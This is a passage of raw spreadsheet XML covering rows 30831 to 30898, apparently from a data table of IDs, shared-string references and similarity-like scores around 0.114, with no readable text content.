      </c>
      <c r="B30831" s="2">
        <v>4.4224524E7</v>
      </c>
      <c r="C30831" s="2" t="s">
        <v>29646</v>
      </c>
      <c r="D30831" s="2">
        <v>1.0</v>
      </c>
      <c r="E30831" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30831" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30832" ht="15.75" customHeight="1">
      <c r="A30832" s="1">
        <v>15968.0</v>
      </c>
      <c r="B30832" s="2">
        <v>4.478792E7</v>
      </c>
      <c r="C30832" s="2" t="s">
        <v>29647</v>
      </c>
      <c r="D30832" s="2">
        <v>1.0</v>
      </c>
      <c r="E30832" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30832" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30833" ht="15.75" customHeight="1">
      <c r="A30833" s="1">
        <v>16050.0</v>
      </c>
      <c r="B30833" s="2">
        <v>4.522203E7</v>
      </c>
      <c r="C30833" s="2" t="s">
        <v>29648</v>
      </c>
      <c r="D30833" s="2">
        <v>1.0</v>
      </c>
      <c r="E30833" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30833" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30834" ht="15.75" customHeight="1">
      <c r="A30834" s="1">
        <v>16146.0</v>
      </c>
      <c r="B30834" s="2">
        <v>4.557694E7</v>
      </c>
      <c r="C30834" s="2" t="s">
        <v>29649</v>
      </c>
      <c r="D30834" s="2">
        <v>1.0</v>
      </c>
      <c r="E30834" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30834" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30835" ht="15.75" customHeight="1">
      <c r="A30835" s="1">
        <v>16187.0</v>
      </c>
      <c r="B30835" s="2">
        <v>4.56606E7</v>
      </c>
      <c r="C30835" s="2" t="s">
        <v>29650</v>
      </c>
      <c r="D30835" s="2">
        <v>1.0</v>
      </c>
      <c r="E30835" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30835" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30836" ht="15.75" customHeight="1">
      <c r="A30836" s="1">
        <v>16461.0</v>
      </c>
      <c r="B30836" s="2">
        <v>4.6452429E7</v>
      </c>
      <c r="C30836" s="2" t="s">
        <v>29651</v>
      </c>
      <c r="D30836" s="2">
        <v>1.0</v>
      </c>
      <c r="E30836" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30836" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30837" ht="15.75" customHeight="1">
      <c r="A30837" s="1">
        <v>16601.0</v>
      </c>
      <c r="B30837" s="2">
        <v>4.7025099E7</v>
      </c>
      <c r="C30837" s="2" t="s">
        <v>29652</v>
      </c>
      <c r="D30837" s="2">
        <v>1.0</v>
      </c>
      <c r="E30837" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30837" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30838" ht="15.75" customHeight="1">
      <c r="A30838" s="1">
        <v>16836.0</v>
      </c>
      <c r="B30838" s="2">
        <v>4.7898289E7</v>
      </c>
      <c r="C30838" s="2" t="s">
        <v>29653</v>
      </c>
      <c r="D30838" s="2">
        <v>1.0</v>
      </c>
      <c r="E30838" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30838" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30839" ht="15.75" customHeight="1">
      <c r="A30839" s="1">
        <v>17674.0</v>
      </c>
      <c r="B30839" s="2">
        <v>5.048974E7</v>
      </c>
      <c r="C30839" s="2" t="s">
        <v>29654</v>
      </c>
      <c r="D30839" s="2">
        <v>1.0</v>
      </c>
      <c r="E30839" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30839" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30840" ht="15.75" customHeight="1">
      <c r="A30840" s="1">
        <v>17836.0</v>
      </c>
      <c r="B30840" s="2">
        <v>5.0930077E7</v>
      </c>
      <c r="C30840" s="2" t="s">
        <v>29655</v>
      </c>
      <c r="D30840" s="2">
        <v>1.0</v>
      </c>
      <c r="E30840" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30840" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30841" ht="15.75" customHeight="1">
      <c r="A30841" s="1">
        <v>17951.0</v>
      </c>
      <c r="B30841" s="2">
        <v>5.1256854E7</v>
      </c>
      <c r="C30841" s="2" t="s">
        <v>29656</v>
      </c>
      <c r="D30841" s="2">
        <v>1.0</v>
      </c>
      <c r="E30841" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30841" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30842" ht="15.75" customHeight="1">
      <c r="A30842" s="1">
        <v>17965.0</v>
      </c>
      <c r="B30842" s="2">
        <v>5.1347123E7</v>
      </c>
      <c r="C30842" s="2" t="s">
        <v>29657</v>
      </c>
      <c r="D30842" s="2">
        <v>1.0</v>
      </c>
      <c r="E30842" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30842" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30843" ht="15.75" customHeight="1">
      <c r="A30843" s="1">
        <v>18125.0</v>
      </c>
      <c r="B30843" s="2">
        <v>5.1780697E7</v>
      </c>
      <c r="C30843" s="2" t="s">
        <v>29658</v>
      </c>
      <c r="D30843" s="2">
        <v>1.0</v>
      </c>
      <c r="E30843" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30843" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30844" ht="15.75" customHeight="1">
      <c r="A30844" s="1">
        <v>18569.0</v>
      </c>
      <c r="B30844" s="2">
        <v>5.3196788E7</v>
      </c>
      <c r="C30844" s="2" t="s">
        <v>29659</v>
      </c>
      <c r="D30844" s="2">
        <v>1.0</v>
      </c>
      <c r="E30844" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30844" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30845" ht="15.75" customHeight="1">
      <c r="A30845" s="1">
        <v>18630.0</v>
      </c>
      <c r="B30845" s="2">
        <v>5.3380198E7</v>
      </c>
      <c r="C30845" s="2" t="s">
        <v>29660</v>
      </c>
      <c r="D30845" s="2">
        <v>1.0</v>
      </c>
      <c r="E30845" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30845" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30846" ht="15.75" customHeight="1">
      <c r="A30846" s="1">
        <v>18643.0</v>
      </c>
      <c r="B30846" s="2">
        <v>5.3424004E7</v>
      </c>
      <c r="C30846" s="2" t="s">
        <v>29661</v>
      </c>
      <c r="D30846" s="2">
        <v>1.0</v>
      </c>
      <c r="E30846" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30846" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30847" ht="15.75" customHeight="1">
      <c r="A30847" s="1">
        <v>18996.0</v>
      </c>
      <c r="B30847" s="2">
        <v>5.4432895E7</v>
      </c>
      <c r="C30847" s="2" t="s">
        <v>29662</v>
      </c>
      <c r="D30847" s="2">
        <v>1.0</v>
      </c>
      <c r="E30847" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30847" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30848" ht="15.75" customHeight="1">
      <c r="A30848" s="1">
        <v>19300.0</v>
      </c>
      <c r="B30848" s="2">
        <v>5.5214043E7</v>
      </c>
      <c r="C30848" s="2" t="s">
        <v>29663</v>
      </c>
      <c r="D30848" s="2">
        <v>1.0</v>
      </c>
      <c r="E30848" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30848" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30849" ht="15.75" customHeight="1">
      <c r="A30849" s="1">
        <v>19565.0</v>
      </c>
      <c r="B30849" s="2">
        <v>5.6109445E7</v>
      </c>
      <c r="C30849" s="2" t="s">
        <v>29664</v>
      </c>
      <c r="D30849" s="2">
        <v>1.0</v>
      </c>
      <c r="E30849" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30849" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30850" ht="15.75" customHeight="1">
      <c r="A30850" s="1">
        <v>20923.0</v>
      </c>
      <c r="B30850" s="2">
        <v>1.6393808E7</v>
      </c>
      <c r="C30850" s="2" t="s">
        <v>29665</v>
      </c>
      <c r="D30850" s="2">
        <v>1.0</v>
      </c>
      <c r="E30850" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30850" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30851" ht="15.75" customHeight="1">
      <c r="A30851" s="1">
        <v>21347.0</v>
      </c>
      <c r="B30851" s="2">
        <v>2.1239027E7</v>
      </c>
      <c r="C30851" s="2" t="s">
        <v>29666</v>
      </c>
      <c r="D30851" s="2">
        <v>1.0</v>
      </c>
      <c r="E30851" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30851" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30852" ht="15.75" customHeight="1">
      <c r="A30852" s="1">
        <v>21518.0</v>
      </c>
      <c r="B30852" s="2">
        <v>2.3216933E7</v>
      </c>
      <c r="C30852" s="2" t="s">
        <v>29667</v>
      </c>
      <c r="D30852" s="2">
        <v>1.0</v>
      </c>
      <c r="E30852" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30852" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30853" ht="15.75" customHeight="1">
      <c r="A30853" s="1">
        <v>21763.0</v>
      </c>
      <c r="B30853" s="2">
        <v>2.6260118E7</v>
      </c>
      <c r="C30853" s="2" t="s">
        <v>29668</v>
      </c>
      <c r="D30853" s="2">
        <v>1.0</v>
      </c>
      <c r="E30853" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30853" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30854" ht="15.75" customHeight="1">
      <c r="A30854" s="1">
        <v>22220.0</v>
      </c>
      <c r="B30854" s="2">
        <v>3.227434E7</v>
      </c>
      <c r="C30854" s="2" t="s">
        <v>29669</v>
      </c>
      <c r="D30854" s="2">
        <v>1.0</v>
      </c>
      <c r="E30854" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30854" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30855" ht="15.75" customHeight="1">
      <c r="A30855" s="1">
        <v>22350.0</v>
      </c>
      <c r="B30855" s="2">
        <v>3.4561651E7</v>
      </c>
      <c r="C30855" s="2" t="s">
        <v>29670</v>
      </c>
      <c r="D30855" s="2">
        <v>1.0</v>
      </c>
      <c r="E30855" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30855" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30856" ht="15.75" customHeight="1">
      <c r="A30856" s="1">
        <v>22637.0</v>
      </c>
      <c r="B30856" s="2">
        <v>4.0622053E7</v>
      </c>
      <c r="C30856" s="2" t="s">
        <v>29671</v>
      </c>
      <c r="D30856" s="2">
        <v>1.0</v>
      </c>
      <c r="E30856" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30856" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30857" ht="15.75" customHeight="1">
      <c r="A30857" s="1">
        <v>23194.0</v>
      </c>
      <c r="B30857" s="2">
        <v>5241039.0</v>
      </c>
      <c r="C30857" s="2" t="s">
        <v>29672</v>
      </c>
      <c r="D30857" s="2">
        <v>1.0</v>
      </c>
      <c r="E30857" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30857" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30858" ht="15.75" customHeight="1">
      <c r="A30858" s="1">
        <v>24766.0</v>
      </c>
      <c r="B30858" s="2">
        <v>1.1846768E7</v>
      </c>
      <c r="C30858" s="2" t="s">
        <v>29673</v>
      </c>
      <c r="D30858" s="2">
        <v>1.0</v>
      </c>
      <c r="E30858" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30858" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30859" ht="15.75" customHeight="1">
      <c r="A30859" s="1">
        <v>24991.0</v>
      </c>
      <c r="B30859" s="2">
        <v>1.2687716E7</v>
      </c>
      <c r="C30859" s="2" t="s">
        <v>29674</v>
      </c>
      <c r="D30859" s="2">
        <v>1.0</v>
      </c>
      <c r="E30859" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30859" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30860" ht="15.75" customHeight="1">
      <c r="A30860" s="1">
        <v>25295.0</v>
      </c>
      <c r="B30860" s="2">
        <v>1.3410231E7</v>
      </c>
      <c r="C30860" s="2" t="s">
        <v>29675</v>
      </c>
      <c r="D30860" s="2">
        <v>1.0</v>
      </c>
      <c r="E30860" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30860" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30861" ht="15.75" customHeight="1">
      <c r="A30861" s="1">
        <v>25685.0</v>
      </c>
      <c r="B30861" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C30861" s="2" t="s">
        <v>29676</v>
      </c>
      <c r="D30861" s="2">
        <v>1.0</v>
      </c>
      <c r="E30861" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30861" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30862" ht="15.75" customHeight="1">
      <c r="A30862" s="1">
        <v>25794.0</v>
      </c>
      <c r="B30862" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C30862" s="2" t="s">
        <v>29677</v>
      </c>
      <c r="D30862" s="2">
        <v>1.0</v>
      </c>
      <c r="E30862" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30862" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30863" ht="15.75" customHeight="1">
      <c r="A30863" s="1">
        <v>26536.0</v>
      </c>
      <c r="B30863" s="2">
        <v>1.7710399E7</v>
      </c>
      <c r="C30863" s="2" t="s">
        <v>29678</v>
      </c>
      <c r="D30863" s="2">
        <v>1.0</v>
      </c>
      <c r="E30863" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30863" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30864" ht="15.75" customHeight="1">
      <c r="A30864" s="1">
        <v>26588.0</v>
      </c>
      <c r="B30864" s="2">
        <v>1.7943838E7</v>
      </c>
      <c r="C30864" s="2" t="s">
        <v>29679</v>
      </c>
      <c r="D30864" s="2">
        <v>1.0</v>
      </c>
      <c r="E30864" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30864" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30865" ht="15.75" customHeight="1">
      <c r="A30865" s="1">
        <v>26746.0</v>
      </c>
      <c r="B30865" s="2">
        <v>1.8344221E7</v>
      </c>
      <c r="C30865" s="2" t="s">
        <v>29680</v>
      </c>
      <c r="D30865" s="2">
        <v>1.0</v>
      </c>
      <c r="E30865" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30865" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30866" ht="15.75" customHeight="1">
      <c r="A30866" s="1">
        <v>26917.0</v>
      </c>
      <c r="B30866" s="2">
        <v>1.9390403E7</v>
      </c>
      <c r="C30866" s="2" t="s">
        <v>29681</v>
      </c>
      <c r="D30866" s="2">
        <v>1.0</v>
      </c>
      <c r="E30866" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30866" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30867" ht="15.75" customHeight="1">
      <c r="A30867" s="1">
        <v>27026.0</v>
      </c>
      <c r="B30867" s="2">
        <v>2.0040422E7</v>
      </c>
      <c r="C30867" s="2" t="s">
        <v>29682</v>
      </c>
      <c r="D30867" s="2">
        <v>1.0</v>
      </c>
      <c r="E30867" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30867" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30868" ht="15.75" customHeight="1">
      <c r="A30868" s="1">
        <v>27141.0</v>
      </c>
      <c r="B30868" s="2">
        <v>2.0767257E7</v>
      </c>
      <c r="C30868" s="2" t="s">
        <v>29683</v>
      </c>
      <c r="D30868" s="2">
        <v>1.0</v>
      </c>
      <c r="E30868" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30868" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30869" ht="15.75" customHeight="1">
      <c r="A30869" s="1">
        <v>27258.0</v>
      </c>
      <c r="B30869" s="2">
        <v>2.1161357E7</v>
      </c>
      <c r="C30869" s="2" t="s">
        <v>29684</v>
      </c>
      <c r="D30869" s="2">
        <v>1.0</v>
      </c>
      <c r="E30869" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30869" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30870" ht="15.75" customHeight="1">
      <c r="A30870" s="1">
        <v>27794.0</v>
      </c>
      <c r="B30870" s="2">
        <v>2.315078E7</v>
      </c>
      <c r="C30870" s="2" t="s">
        <v>29685</v>
      </c>
      <c r="D30870" s="2">
        <v>1.0</v>
      </c>
      <c r="E30870" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30870" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30871" ht="15.75" customHeight="1">
      <c r="A30871" s="1">
        <v>28023.0</v>
      </c>
      <c r="B30871" s="2">
        <v>2.4389414E7</v>
      </c>
      <c r="C30871" s="2" t="s">
        <v>29686</v>
      </c>
      <c r="D30871" s="2">
        <v>1.0</v>
      </c>
      <c r="E30871" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30871" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30872" ht="15.75" customHeight="1">
      <c r="A30872" s="1">
        <v>28260.0</v>
      </c>
      <c r="B30872" s="2">
        <v>2.5368316E7</v>
      </c>
      <c r="C30872" s="2" t="s">
        <v>29687</v>
      </c>
      <c r="D30872" s="2">
        <v>1.0</v>
      </c>
      <c r="E30872" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30872" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30873" ht="15.75" customHeight="1">
      <c r="A30873" s="1">
        <v>28894.0</v>
      </c>
      <c r="B30873" s="2">
        <v>2.9283104E7</v>
      </c>
      <c r="C30873" s="2" t="s">
        <v>29688</v>
      </c>
      <c r="D30873" s="2">
        <v>1.0</v>
      </c>
      <c r="E30873" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30873" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30874" ht="15.75" customHeight="1">
      <c r="A30874" s="1">
        <v>29000.0</v>
      </c>
      <c r="B30874" s="2">
        <v>2.9866534E7</v>
      </c>
      <c r="C30874" s="2" t="s">
        <v>29679</v>
      </c>
      <c r="D30874" s="2">
        <v>1.0</v>
      </c>
      <c r="E30874" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30874" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30875" ht="15.75" customHeight="1">
      <c r="A30875" s="1">
        <v>29068.0</v>
      </c>
      <c r="B30875" s="2">
        <v>3.0300992E7</v>
      </c>
      <c r="C30875" s="2" t="s">
        <v>29689</v>
      </c>
      <c r="D30875" s="2">
        <v>1.0</v>
      </c>
      <c r="E30875" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30875" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30876" ht="15.75" customHeight="1">
      <c r="A30876" s="1">
        <v>29950.0</v>
      </c>
      <c r="B30876" s="2">
        <v>3607595.0</v>
      </c>
      <c r="C30876" s="2" t="s">
        <v>29690</v>
      </c>
      <c r="D30876" s="2">
        <v>1.0</v>
      </c>
      <c r="E30876" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30876" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30877" ht="15.75" customHeight="1">
      <c r="A30877" s="1">
        <v>29991.0</v>
      </c>
      <c r="B30877" s="2">
        <v>3612078.0</v>
      </c>
      <c r="C30877" s="2" t="s">
        <v>29691</v>
      </c>
      <c r="D30877" s="2">
        <v>1.0</v>
      </c>
      <c r="E30877" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30877" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30878" ht="15.75" customHeight="1">
      <c r="A30878" s="1">
        <v>31042.0</v>
      </c>
      <c r="B30878" s="2">
        <v>4.7876243E7</v>
      </c>
      <c r="C30878" s="2" t="s">
        <v>29692</v>
      </c>
      <c r="D30878" s="2">
        <v>1.0</v>
      </c>
      <c r="E30878" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30878" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30879" ht="15.75" customHeight="1">
      <c r="A30879" s="1">
        <v>32229.0</v>
      </c>
      <c r="B30879" s="2">
        <v>5.4941345E7</v>
      </c>
      <c r="C30879" s="2" t="s">
        <v>29693</v>
      </c>
      <c r="D30879" s="2">
        <v>1.0</v>
      </c>
      <c r="E30879" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30879" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30880" ht="15.75" customHeight="1">
      <c r="A30880" s="1">
        <v>33646.0</v>
      </c>
      <c r="B30880" s="2">
        <v>8398850.0</v>
      </c>
      <c r="C30880" s="2" t="s">
        <v>29694</v>
      </c>
      <c r="D30880" s="2">
        <v>1.0</v>
      </c>
      <c r="E30880" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30880" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30881" ht="15.75" customHeight="1">
      <c r="A30881" s="1">
        <v>33908.0</v>
      </c>
      <c r="B30881" s="2">
        <v>9221568.0</v>
      </c>
      <c r="C30881" s="2" t="s">
        <v>29685</v>
      </c>
      <c r="D30881" s="2">
        <v>1.0</v>
      </c>
      <c r="E30881" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30881" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30882" ht="15.75" customHeight="1">
      <c r="A30882" s="1">
        <v>18665.0</v>
      </c>
      <c r="B30882" s="2">
        <v>5.3520632E7</v>
      </c>
      <c r="C30882" s="2" t="s">
        <v>29695</v>
      </c>
      <c r="D30882" s="2">
        <v>1.0</v>
      </c>
      <c r="E30882" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30882" s="2">
        <v>0.1141414141414142</v>
      </c>
    </row>
    <row r="30883" ht="15.75" customHeight="1">
      <c r="A30883" s="1">
        <v>597.0</v>
      </c>
      <c r="B30883" s="2">
        <v>1.9214374E7</v>
      </c>
      <c r="C30883" s="2" t="s">
        <v>29696</v>
      </c>
      <c r="D30883" s="2">
        <v>1.0</v>
      </c>
      <c r="E30883" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30883" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30884" ht="15.75" customHeight="1">
      <c r="A30884" s="1">
        <v>2832.0</v>
      </c>
      <c r="B30884" s="2">
        <v>3.5419314E7</v>
      </c>
      <c r="C30884" s="2" t="s">
        <v>29697</v>
      </c>
      <c r="D30884" s="2">
        <v>1.0</v>
      </c>
      <c r="E30884" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30884" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30885" ht="15.75" customHeight="1">
      <c r="A30885" s="1">
        <v>3143.0</v>
      </c>
      <c r="B30885" s="2">
        <v>3.6926764E7</v>
      </c>
      <c r="C30885" s="2" t="s">
        <v>29698</v>
      </c>
      <c r="D30885" s="2">
        <v>1.0</v>
      </c>
      <c r="E30885" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30885" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30886" ht="15.75" customHeight="1">
      <c r="A30886" s="1">
        <v>6470.0</v>
      </c>
      <c r="B30886" s="2">
        <v>4.8651902E7</v>
      </c>
      <c r="C30886" s="2" t="s">
        <v>29699</v>
      </c>
      <c r="D30886" s="2">
        <v>1.0</v>
      </c>
      <c r="E30886" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30886" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30887" ht="15.75" customHeight="1">
      <c r="A30887" s="1">
        <v>18181.0</v>
      </c>
      <c r="B30887" s="2">
        <v>5.1992667E7</v>
      </c>
      <c r="C30887" s="2" t="s">
        <v>29700</v>
      </c>
      <c r="D30887" s="2">
        <v>1.0</v>
      </c>
      <c r="E30887" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30887" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30888" ht="15.75" customHeight="1">
      <c r="A30888" s="1">
        <v>18783.0</v>
      </c>
      <c r="B30888" s="2">
        <v>5.3825609E7</v>
      </c>
      <c r="C30888" s="2" t="s">
        <v>29701</v>
      </c>
      <c r="D30888" s="2">
        <v>1.0</v>
      </c>
      <c r="E30888" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30888" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30889" ht="15.75" customHeight="1">
      <c r="A30889" s="1">
        <v>20500.0</v>
      </c>
      <c r="B30889" s="2">
        <v>1.2890219E7</v>
      </c>
      <c r="C30889" s="2" t="s">
        <v>29702</v>
      </c>
      <c r="D30889" s="2">
        <v>1.0</v>
      </c>
      <c r="E30889" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30889" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30890" ht="15.75" customHeight="1">
      <c r="A30890" s="1">
        <v>25380.0</v>
      </c>
      <c r="B30890" s="2">
        <v>1.3655174E7</v>
      </c>
      <c r="C30890" s="2" t="s">
        <v>29703</v>
      </c>
      <c r="D30890" s="2">
        <v>1.0</v>
      </c>
      <c r="E30890" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30890" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30891" ht="15.75" customHeight="1">
      <c r="A30891" s="1">
        <v>25800.0</v>
      </c>
      <c r="B30891" s="2">
        <v>1.4694461E7</v>
      </c>
      <c r="C30891" s="2" t="s">
        <v>29704</v>
      </c>
      <c r="D30891" s="2">
        <v>1.0</v>
      </c>
      <c r="E30891" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30891" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30892" ht="15.75" customHeight="1">
      <c r="A30892" s="1">
        <v>27755.0</v>
      </c>
      <c r="B30892" s="2">
        <v>2.3102303E7</v>
      </c>
      <c r="C30892" s="2" t="s">
        <v>29705</v>
      </c>
      <c r="D30892" s="2">
        <v>1.0</v>
      </c>
      <c r="E30892" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30892" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30893" ht="15.75" customHeight="1">
      <c r="A30893" s="1">
        <v>28259.0</v>
      </c>
      <c r="B30893" s="2">
        <v>2.5368094E7</v>
      </c>
      <c r="C30893" s="2" t="s">
        <v>29706</v>
      </c>
      <c r="D30893" s="2">
        <v>1.0</v>
      </c>
      <c r="E30893" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30893" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30894" ht="15.75" customHeight="1">
      <c r="A30894" s="1">
        <v>28498.0</v>
      </c>
      <c r="B30894" s="2">
        <v>2.6692621E7</v>
      </c>
      <c r="C30894" s="2" t="s">
        <v>29707</v>
      </c>
      <c r="D30894" s="2">
        <v>1.0</v>
      </c>
      <c r="E30894" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30894" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30895" ht="15.75" customHeight="1">
      <c r="A30895" s="1">
        <v>28539.0</v>
      </c>
      <c r="B30895" s="2">
        <v>2.684247E7</v>
      </c>
      <c r="C30895" s="2" t="s">
        <v>29708</v>
      </c>
      <c r="D30895" s="2">
        <v>1.0</v>
      </c>
      <c r="E30895" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30895" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="30896" ht="15.75" customHeight="1">
      <c r="A30896" s="1">
        <v>2799.0</v>
      </c>
      <c r="B30896" s="2">
        <v>3.5282022E7</v>
      </c>
      <c r="C30896" s="2" t="s">
        <v>29709</v>
      </c>
      <c r="D30896" s="2">
        <v>1.0</v>
      </c>
      <c r="E30896" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30896" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="30897" ht="15.75" customHeight="1">
      <c r="A30897" s="1">
        <v>4374.0</v>
      </c>
      <c r="B30897" s="2">
        <v>4.2145566E7</v>
      </c>
      <c r="C30897" s="2" t="s">
        <v>29710</v>
      </c>
      <c r="D30897" s="2">
        <v>1.0</v>
      </c>
      <c r="E30897" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30897" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="30898" ht="15.75" customHeight="1">
      <c r="A30898" s="1">
        <v>11587.0</v>
      </c>
